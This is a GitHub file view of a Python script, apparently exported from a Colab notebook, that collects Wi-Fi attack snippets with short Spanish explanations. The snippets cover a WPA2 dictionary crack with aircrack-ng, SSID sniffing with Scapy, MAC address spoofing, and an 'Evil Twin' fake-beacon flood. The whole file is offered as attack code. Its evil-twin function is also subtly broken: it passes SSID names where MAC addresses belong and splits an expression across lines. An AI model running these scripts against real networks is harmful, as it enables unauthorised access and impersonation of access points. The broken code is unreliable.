-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathwifi_attacks.py
More file actions
59 lines (40 loc) · 2.25 KB
/
wifi_attacks.py
File metadata and controls
59 lines (40 loc) · 2.25 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
# -*- coding: utf-8 -*-
"""Wifi-Attacks.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1OpqeRdx2TC2aDQstwiHbxa9qP86E2Xcd
"""
import subprocess
def crack_wpa2(ssid, dictionary_file):
# Uso de aircrack-ng para realizar el ataque de fuerza bruta
command = f"aircrack-ng -e {ssid} -w {dictionary_file} capture-01.cap"
subprocess.run(command, shell=True)
# Uso de la función
crack_wpa2("RedSegura", "diccionario.txt")
"""**Explicación:** Este script en Python utiliza la herramienta aircrack-ng para realizar un ataque de fuerza bruta a una red WPA2 especificada. Se necesita un archivo de diccionario con posibles contraseñas."""
from scapy.all import *
def sniff_ssid(interface):
# Uso de Scapy para capturar paquetes y extraer SSID
sniff(iface=interface, prn=lambda x: x.summary() if x.haslayer(Dot11Beacon) else '')
# Uso de la función
sniff_ssid("wlan0")
"""**Explicación:** Este script en Python utiliza Scapy para capturar paquetes en una interfaz dada y mostrar la información de los paquetes que contienen información sobre las redes inalámbricas (SSIDs)."""
import subprocess
def change_mac(interface, new_mac):
# Uso de subprocess para cambiar la dirección MAC
subprocess.call(["ifconfig", interface, "down"])
subprocess.call(["ifconfig", interface, "hw", "ether", new_mac])
subprocess.call(["ifconfig", interface, "up"])
# Uso de la función
change_mac("wlan0", "00:11:22:33:44:55")
"""**Explicación:** Este script en Python utiliza subprocess para cambiar la dirección MAC de una interfaz de red dada."""
from scapy.all import *
def evil_twin(interface, target_ssid, evil_ssid):
# Creación de un paquete Beacon falso para el ataque "Evil Twin"
frame = RadioTap()/Dot11(type=0,subtype=8,addr1="ff:ff:ff:ff:ff:ff",addr2=target_ssid,addr3=target_ssid)/
Dot11Beacon(cap="ESS")/Dot11Elt(ID="SSID",info=evil_ssid)/Dot11Elt(ID="Rates",info='\x82\x84\x0b\x16')
# Envío del paquete
sendp(frame, iface=interface, inter=0.1, loop=1)
# Uso de la función
evil_twin("wlan0", "TargetSSID", "EvilTwinSSID")
"""**Explicación:** Este script en Python utiliza Scapy para construir y enviar un paquete Beacon falso, creando así una red "Evil Twin"."""